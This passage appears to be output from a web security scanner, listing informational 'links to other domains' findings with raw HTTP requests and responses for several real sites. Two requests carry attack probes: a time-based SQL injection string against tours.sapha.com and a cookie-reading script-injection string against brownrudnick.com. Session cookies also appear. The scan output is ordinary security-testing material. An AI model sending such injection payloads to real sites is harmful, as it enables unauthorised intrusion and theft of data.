ONMOUSEOUT='youtubeswap.src="http://de.nlx.org/buttons/social/youtube.gif"'><img src="http://de.nlx.org/buttons/social/youtube.gif" NAME="youtubeswap"/></a>

<a href="http://www.facebook.com/pages/BT-Careers/123009137753569" target=_blank" alt="BT Americas Careers on Facebook"
ONMOUSEOVER='fbswap.src="http://de.nlx.org/buttons/social/facebook_hover.gif"'
ONMOUSEOUT='fbswap.src="http://de.nlx.org/buttons/social/facebook.gif"'><img src="http://de.nlx.org/buttons/social/facebook.gif" NAME="fbswap"/></a></li>

<a href="http://www.linkedin.com/companies/bt" target="_blank" alt="BT Careers on LinkedIn"
ONMOUSEOVER='linkedinswap.src="http://de.nlx.org/buttons/social/linkedin_hover.gif"'
ONMOUSEOUT='linkedinswap.src="http://de.nlx.org/buttons/social/linkedin.gif"'><img src="http://de.nlx.org/buttons/social/linkedin.gif" NAME="linkedinswap"/></a>

<a href="http://www.directemployers.org/become-a-follower/" target="_blank" alt="DirectEmployers E-News"
ONMOUSEOVER='enewsswap.src="http://de.nlx.org/buttons/social/enews_hover.gif"'
ONMOUSEOUT='enewsswap.src="http://de.nlx.org/buttons/social/enews.gif"'><img src="http://de.nlx.org/buttons/social/enews.gif" NAME="enewsswap"/></a>
...[SNIP]...
<td colspan=2 width='100%'><a href=http://jobs.btamericascareers.com>Browse Jobs</a>
...[SNIP]...
</FORM>
<a href=http://jobs.btamericascareers.com>Browse Jobs</a>
<A href="http://www.btplc.com/privacypolicy/Privacypolicy.htm" target="_blank">Privacy policy</A>
<A href="http://www.btplc.com/Glossary/index.htm" target="_blank">Glossary</A>
<A href="http://www.btplc.com/Emailalerts/index.cfm" target="_blank">Email alerts</A>
<A href="http://www.btplc.com/Thegroup/ContactBT/feedback.CFM" target="_blank">Contact BT</A>
...[SNIP]...
24.47. http://tours.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<noscript><object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="770" align="middle" height="540" id="tour_8a146f1a3da4700cbf03cdc55e2daae6" name="tour_8a146f1a3da4700cbf03cdc55e2daae6">
<param name="movie" value="http://tours.sapha.com/player/hta750x500.swf">
...[SNIP]...
24.48. https://verify.authorize.net/anetseal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://verify.authorize.net
Path:   /anetseal/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /anetseal/?pid=3de2b6f5-d068-4960-b93c-80b3d36d8ffe&rurl=https%3A//www.clone-systems.com/ecommerce/login.php%3Faction%3Dsend_password_email HTTP/1.1
Host: verify.authorize.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5797


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<title>Authorize.Net Verified Merchant Seal</title>
<meta name="GENERATOR" Content="Microsoft Visual St
...[SNIP]...
<td class="MainHeaderFont">
               <a href= https://www.clone-systems.com/ecommerce/login.php?action=send_password_email > www.clone-systems.com</a>
...[SNIP]...
<p>
                               You can be confident in knowing that <a href= https://www.clone-systems.com/ecommerce/login.php?action=send_password_email > www.clone-systems.com</a>
...[SNIP]...
24.49. http://www.advisorsquare.com/new/asframeless02/content.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /new/asframeless02/content.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /new/asframeless02/content.asp?contentid=2016551940 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4006
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PEPGGKOBHIEHNDFHNNDECDJH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:29 GMT

<html>
<head>
<link rel="STYLESHEET" type="text/css" href="/new/asframeless02/content.asp?contentid=2016552783">
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="Content-Type" con
...[SNIP]...
<BR>Member FINRA &amp; <A href="http://www.SIPC.org" target=blank>SIPC</A>
...[SNIP]...
24.50. http://www.brownrudnick.com/nr/alertsArchv.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nr/alertsArchv.asp?Year=2006 HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:46:49 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 23971
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=COGCALMBNJPDKEEGDCLIJLKB; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
<font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a>
...[SNIP]...
24.51. http://www.brownrudnick.com/nr/articlesindv.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesindv.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nr/articlesindv.asp?ID=554f0bd0<script>alert(document.cookie)</script>ba5591b9a23 HTTP/1.1
Pragma: no-cache
Host: www.brownrudnick.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:48:10 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11237
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=ADHCALMBLMFJLBFNGJKMHGAL; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
<font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a>
...[SNIP]...
24.52. http://www.caribbean-ocean.com/accommodation2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /accommodation2.php?id=8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 19282

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
<!-- centre - x, y & radius -->
       <area href="http://ttatravelinsurance.traveltrust.co.uk/Default.aspx?auth=1baiw1VjNcpNg7fMQV9GrZP12gYuGfsfCRJhS/Qc7M/KZi10AQ+Glmn4c4MQM4EoCQZSC9s6NXrx+9XbJSUBH1X1GjRW3EGcNknsGQACq1M=" target="blank" title="TTA" shape="circle" coords="108,45,12">
   </map>
...[SNIP]...
<br />
   &copy; Website designed and maintained by <a href="http://www.2orque.com">2orque.com</a>
...[SNIP]...
24.53. http://www.clone-systems.com/ecommerce/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
                   <a href="https://www.authorize.net/" id="AuthorizeNetText" target="_blank">Online Payments</a>
...[SNIP]...
24.54. http://www.clone-systems.com/ecommerce/javascript/product.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/javascript/product.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ecommerce/javascript/product.js?1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:14:53 GMT
Server: Apache
Last-Modified: Fri, 18 Dec 2009 02:09:13 GMT
ETag: "20001a-12c1-47af739dae440"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 4801

/**
* All functions have been moved to product.functions.js
* This is because this file was used in the control panel as well as the front end, but the
* below initialization code is only meant for
...[SNIP]...
</param>'
               + '<embed src="http://www.youtube.com/v/' + videoId + '?&fs=1&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="265"></embed>
...[SNIP]...
</param>'
                       + '<embed src="http://www.youtube.com/v/' + videoId + '?&fs=1&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...
24.55. https://www.clone-systems.com/ecommerce/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/login.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ecommerce/login.php?action=reset_password HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: https://www.clone-systems.com/ecommerce/checkout.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 19573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
                   <a href="https://www.authorize.net/" id="AuthorizeNetText" target="_blank">Online Payments</a>
...[SNIP]...
24.56. http://www.compliancepoint.com/sub_serv_isc_pci.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancepoint.com
Path:   /sub_serv_isc_pci.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ HTTP/1.1
Host: www.compliancepoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:16:34 GMT
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e72934c3e090fe010326c542496bd26f; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.compliancepoint.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 17114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADDBQTC=NKAKGEBDADCKPECBKIOIPJEM; path=/
Cache-control: private

<html>
<head>
<title>CompliancePoint</title>

<link href="menu.css" type=text/css rel=stylesheet />
<link href="style.css" type=text/css rel=stylesheet />
<script src="main.js"></script>
<scrip
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<!-- Share This -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=0adb3f43-ad3c-4c7f-9bf8-7997b41d316a&amp;type=website"></script>
...[SNIP]...
<strong>Security Standards Council<a href="https://www.pcisecuritystandards.org/">. </a>
...[SNIP]...
</table>


<a href="http://www1.dncsolution.com/marketing2/reginfo/"><img src="images/ad_blue_chart.png" width="209" height="50" border="0" />
...[SNIP]...
<br />
<a href="http://www1.dncsolution.com/marketing2/reginfo/regnews.asp"><img src="images/ad_blue_info.png" width="209" height="50" border="0" />
...[SNIP]...
24.57. http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicperimeter.com
Path:   /download/Intel_Expressway_Tokenization_Broker/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw HTTP/1.1
Host: www.dynamicperimeter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: pdpr=googletokenization; Expires=Sun, 08-May-2011 01:16:02 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 29614


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta htt
...[SNIP]...
<meta name="ROBOTS" content="ALL" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
   
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<li> <a href="http://www.nordicedge.se/en/products/one-time-password-server" target="_blank">One Time Password Server</a>
...[SNIP]...
<li> <a href="http://www.nordicedge.se/en/products/opacus" target="_blank">Opacus Cloud</a>
...[SNIP]...
rm, you agree that we may contact you for marketing and sales follow-up. You will be presented with an opt-out option in all future contact. For more information on Intel...s privacy policy please see <a href="http://www.intel.com/sites/corporate/privacy.htm" target="_blank">http://www.intel.com/sites/corporate/privacy.htm</a>
...[SNIP]...
<area shape="rect" coords="30,300,164,322" href="/download/SecurityGateway_BuyersGuide" /><area shape="rect" coords="69,59,91,81" href="http://soaexpressway.wordpress.com/feed/" target="_blank" /><area shape="rect" coords="109,59,131,82" href="http://www.facebook.com/IntelSOAExpressway" target="_blank" />
<area shape="rect" coords="149,57,173,81" href="http://twitter.com/IntelExpressway" target="_blank" />
</map>
...[SNIP]...
<div class="footerContainer"><a href="http://www.intel.com/feedback.htm?iid=ftr+contact" target="_blank">Contact Us</a>
...[SNIP]...
</a> <a href="http://www.intel.com/sites/corporate/termsofuse.htm?iid=ftr+terms" target="_blank">Terms of Use</a> <a href="http://www.intel.com/sites/corporate/tradmarx.htm?iid=ftr+trademark" target="_blank">Trademarks</a> <a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy" target="_blank">Privacy</a>
...[SNIP]...
24.58. http://www.expedia.com/daily/hotels/unpublishedrates/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/hotels/unpublishedrates/default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /daily/hotels/unpublishedrates/default.asp?mcicid=101278404 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/default.asp%25252523%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 95603
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Date: Fri, 06 May 2011 22:34:20 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 95603


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<img src="http://media.expedia.com/media/content/expus/graphics/promos/deals/national_parks/nonflash_videoscreen.jpg" usemap="#map1" border="0" />-->
<a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">Get Adobe Flash</a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at/" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.be/" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
